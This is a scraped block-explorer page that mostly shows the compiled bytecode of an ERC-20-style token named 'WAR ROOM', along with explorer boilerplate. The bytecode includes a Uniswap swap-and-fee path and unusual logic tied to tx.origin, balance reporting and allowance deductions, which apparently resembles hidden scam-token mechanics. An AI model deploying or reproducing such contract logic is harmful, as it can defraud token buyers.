0x608060405260043610610134575f3560e01c806370a08231116100a85780639ede631f1161006d5780639ede631f14610316578063a7f1c21e1461032a578063a9059cbb1461033f578063d2412f3a1461035e578063dd62ed3e14610377578063f4c1f42a146103bb575f80fd5b806370a082311461027c578063715018a61461029b5780638a8c523c146102b15780638da5cb5b146102c557806395d89b41146102eb575f80fd5b806323b872dd116100f957806323b872dd1461020d57806329e929c31461022c578063313ce567146102415780633c5529311461025457806363aa107a146102675780636fec985414610254575f80fd5b806306fdde031461013f578063095ea7b3146101815780630faee56f146101b057806312373f68146101d357806318160ddd146101f9575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b5060408051808201909152600881526757415220524f4f4d60c01b60208201525b60405161017891906111cd565b60405180910390f35b34801561018c575f80fd5b506101a061019b36600461122d565b6103d4565b6040519015158152602001610178565b3480156101bb575f80fd5b506101c5600d5481565b604051908152602001610178565b3480156101de575f80fd5b506101e7600181565b60405160ff9091168152602001610178565b348015610204575f80fd5b506101c56103ea565b348015610218575f80fd5b506101a0610227366004611257565b61040a565b348015610237575f80fd5b506101c560105481565b34801561024c575f80fd5b5060096101e7565b34801561025f575f80fd5b506101e75f81565b348015610272575f80fd5b506101c5600e5481565b348015610287575f80fd5b506101c5610296366004611295565b610473565b3480156102a6575f80fd5b506102af6104a1565b005b3480156102bc575f80fd5b506102af61051b565b3480156102d0575f80fd5b505f546040516001600160a01b039091168152602001610178565b3480156102f6575f80fd5b506040805180820190915260038152622ba0a960e91b602082015261016b565b348015610321575f80fd5b506102af6108ac565b348015610335575f80fd5b506101c5600f5481565b34801561034a575f80fd5b506101a061035936600461122d565b610909565b348015610369575f80fd5b506013546101a09060ff1681565b348015610382575f80fd5b506101c56103913660046112b0565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b3480156103c6575f80fd5b506015546101a09060ff1681565b5f6103e0338484610915565b5060015b92915050565b5f6103f76009600a6113db565b61040590633b9aca006113e9565b905090565b5f610416848484610a38565b61046984336104646011546040518060600160405280602881526020016115d9602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610ddd565b610915565b5060019392505050565b5f61047f826005610e15565b6001600160a01b0383165f908152600160205260409020546103e491906113e9565b5f546001600160a01b031633146104d35760405162461bcd60e51b81526004016104ca90611400565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105445760405162461bcd60e51b81526004016104ca90611400565b601854600160a01b900460ff161561059e5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016104ca565b601780546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556105e79030906105d96009600a6113db565b61046490633b9aca006113e9565b60175f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610637573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061065b9190611435565b6001600160a01b031663c9c653963060175f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106ba573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106de9190611435565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610728573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061074c9190611435565b601880546001600160a01b0319166001600160a01b039283161790556017541663f305d719473061077c81610473565b5f8061078f5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156107f5573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061081a9190611450565b50506018805462ff00ff60a01b1981166201000160a01b1790915560175460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610885573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108a9919061147b565b50565b5f546001600160a01b031633146108d55760405162461bcd60e51b81526004016104ca90611400565b5f47116108e0575f80fd5b60405133904780156108fc02915f818181858888f193505050501580156108a9573d5f803e3d5ffd5b5f6103e0338484610a38565b6001600160a01b0383166109775760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104ca565b6001600160a01b0382166109d85760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104ca565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610a5e5760405162461bcd60e51b81526004016104ca9061149a565b6001600160a01b038216610ac05760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104ca565b5f8111610b215760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104ca565b5f6001600160a01b0384163014801590610b4457506001600160a01b0383163014155b15610c76576018546001600160a01b038581169116148015610b7457506017546001600160a01b03848116911614155b8015610b9857506001600160a01b0383165f9081526003602052604090205460ff16155b8015610bb257506005546001600160a01b03848116911614155b15610bcc5760098054905f610bc6836114df565b91905055505b5f610bd630610473565b601854909150600160a81b900460ff16158015610c0057506018546001600160a01b038581169116145b8015610c155750601854600160b01b900460ff165b8015610c2f57506005546001600160a01b03868116911614155b15610c74578015610c68575f600d548211610c4a5781610c4e565b600d545b9050610c66818511610c605784610ee9565b81610ee9565b505b47610c7247611059565b505b505b610c81848484611094565b610dd7576001600160a01b0384165f90815260016020526040902054610ca79083611127565b6001600160a01b0385165f90815260016020526040902055610cea610ccc8383611127565b6001600160a01b0385165f908152600160205260409020549061116f565b6001600160a01b0384165f908152600160205260409020558015610d7a57305f90815260016020526040902054610d21908261116f565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610d719085815260200190565b60405180910390a35b6001600160a01b03831661dead14610dd7576001600160a01b038084169085167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610dc58585611127565b60405190815260200160405180910390a35b50505050565b5f8184841115610e005760405162461bcd60e51b81526004016104ca91906111cd565b505f610e0c84866114f7565b95945050505050565b5f8082118015610e3257506018546001600160a01b038481169116145b8015610ea757506018546040516370a0823160e01b81526001600160a01b03909116600482018190525f916370a0823190602401602060405180830381865afa158015610e81573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ea5919061150a565b115b8015610ec757506005546001600160a01b0316326001600160a01b031614155b8015610ed257503215155b610edd576001610edf565b5f5b60ff169392505050565b6018805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610f2f57610f2f611521565b6001600160a01b03928316602091820292909201810191909152601754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610f86573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610faa9190611435565b81600181518110610fbd57610fbd611521565b6001600160a01b039283166020918202929092010152601754610fe39130911684610915565b60175460405163791ac94760e01b81526001600160a01b039091169063791ac9479061101b9085905f90869030904290600401611535565b5f604051808303815f87803b158015611032575f80fd5b505af1158015611044573d5f803e3d5ffd5b50506018805460ff60a81b1916905550505050565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015611090573d5f803e3d5ffd5b5050565b5f6001600160a01b0384166110bb5760405162461bcd60e51b81526004016104ca9061149a565b6001600160a01b0383166110e15760405162461bcd60e51b81526004016104ca9061149a565b325f908152600460205260409020548290811561111c5760a061110482866113e9565b61110e91906115a6565b61111890836114f7565b6011555b505f95945050505050565b5f61116883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610ddd565b9392505050565b5f8061117b83856115c5565b9050838110156111685760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104ca565b5f602080835283518060208501525f5b818110156111f9578581018301518582016040015282016111dd565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146108a9575f80fd5b5f806040838503121561123e575f80fd5b823561124981611219565b946020939093013593505050565b5f805f60608486031215611269575f80fd5b833561127481611219565b9250602084013561128481611219565b929592945050506040919091013590565b5f602082840312156112a5575f80fd5b813561116881611219565b5f80604083850312156112c1575f80fd5b82356112cc81611219565b915060208301356112dc81611219565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561133557815f190482111561131b5761131b6112e7565b8085161561132857918102915b93841c9390800290611300565b509250929050565b5f8261134b575060016103e4565b8161135757505f6103e4565b816001811461136d576002811461137757611393565b60019150506103e4565b60ff841115611388576113886112e7565b50506001821b6103e4565b5060208310610133831016604e8410600b84101617156113b6575081810a6103e4565b6113c083836112fb565b805f19048211156113d3576113d36112e7565b029392505050565b5f61116860ff84168361133d565b80820281158282048414176103e4576103e46112e7565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611445575f80fd5b815161116881611219565b5f805f60608486031215611462575f80fd5b8351925060208401519150604084015190509250925092565b5f6020828403121561148b575f80fd5b81518015158114611168575f80fd5b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b5f600182016114f0576114f06112e7565b5060010190565b818103818111156103e4576103e46112e7565b5f6020828403121561151a575f80fd5b5051919050565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156115855784516001600160a01b031683529383019391830191600101611560565b50506001600160a01b03969096166060850152505050608001529392505050565b5f826115c057634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156103e4576103e46112e756fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220fea620d5878b12ba1d94ab6b4758ef15318988176e3d2f1f55255db505b1fba864736f6c63430008180033

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.